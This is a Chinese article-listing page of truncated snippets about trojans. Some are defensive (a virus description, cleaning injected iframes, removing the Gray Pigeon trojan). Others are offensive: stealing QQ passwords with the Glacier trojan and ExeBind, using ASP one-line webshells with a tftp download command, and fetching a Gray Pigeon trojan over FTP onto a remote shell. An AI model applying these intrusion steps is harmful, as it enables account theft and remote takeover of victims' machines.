2020-02-16 标签:如何,防范,别人,qq,别人的,密码,请看,前提,工作,你要,下载,木马,冰河,netxray,exebind,远程,监控

请看—— 　　　 1、前提工作，你要去下载木马“冰河”，和“NetxRAY”，还有 “ExeBind”。冰河是一个远程监控软件，是BO一类的东西，只要对方运行了服务端程序，他的系统就随时向你敞开！现在比较流行的是灰鸽子远程控制 ，NetxRAY 是可以用来看对方的IP的；Exebind ，可以把两个

2020-02-16 标签:asp,一句话,木马,原理,分析,通过,http,协议,来访,使用范围,我只,列举,数据库,备份,情况,文件

通过HTTP协议来访问 一句话木马的使用范围(我只列举了2种): 1)只有数据库备份的情况 数据库备份成asp文件时候，不出现“ 编译错误，缺少脚本关闭标志%>" 2)SA权限的时候,一般先写入一句话,图个方便..(当然,直接tftp上传鸽子运行,那更快) tftp -i ip get ser

2020-02-16 标签:recycle,exe,trojan,dropper,win,32,vb,rj,病毒,查杀,方法,描述,通过,u,传播,运行,复制,自身,系统

一、病毒描述：病毒通过U盘传播，运行后复制自身到系统目录并释放一个灰鸽子木马。为增强隐蔽性，生成的病毒文件有回收站和安装程序两种图标。　　二、病毒基本情况：病毒名称：Trojan-Dropper.Win32.VB.rj病毒别名：无病毒类型：病毒危害级别：3感染平台：Windows病毒大小：458,7

2020-02-16 标签:远程,计算机,cmd,下载,ftp,文件,方法,环境,不能通过,ipc,渠道,传送,那就,通过,假设,已经有,服务器,上面,有一个

在远程计算机的CMD环境下，如果不能通过IPC$渠道传送文件，那就只有通过FTP下载文件了。 假设我们已经有一个FTP服务器，上面有一个我们配置好的灰鸽子木马文件mhgz.exe,我们应该知道FTP服务器的三个参数： 1、FTP服务器的IP地址：如1.1.1.1 2、FTP服务器的用户名：如test

2020-02-16 标签:一行,代码,解决,网站,iframe,木马,方案,鸽子,序列,灵儿,最近,公司,和好,朋友,纷纷,有的,挂上,疯狂

最近公司和好朋友的网站纷纷被IFRAME了，有的挂上了鸽子，有的疯狂地弹窗，有的给人家增加流量。一个个文件去查找替换那些IFRAME代码，刚松口气，不久又加上去了，哎，什么世道！于是他们向我这个"JS高手"（他们强加给我的）求救，我也不能等闲视之，只好击键杀杀杀了。 　　 　　因为FF(Firefo

2020-02-16 标签:命令行,暴力,删除,灰鸽,dllhost,exe,今天,wz,比较,有意思,的是,久违,dos,批处理,命令,通过

今天逛WZ,看到这个,比较有意思的是那两个久违的DOS批处理命令. 今天通过远程连接帮一个不太懂电脑的朋友清病毒。看到一堆runauto..目录，再看进程中有c:\windows\dllhost.exe，确定是灰鸽子07. 查到的手动清除方法很多要求安装iceswords或者到安全模式。但远程控制下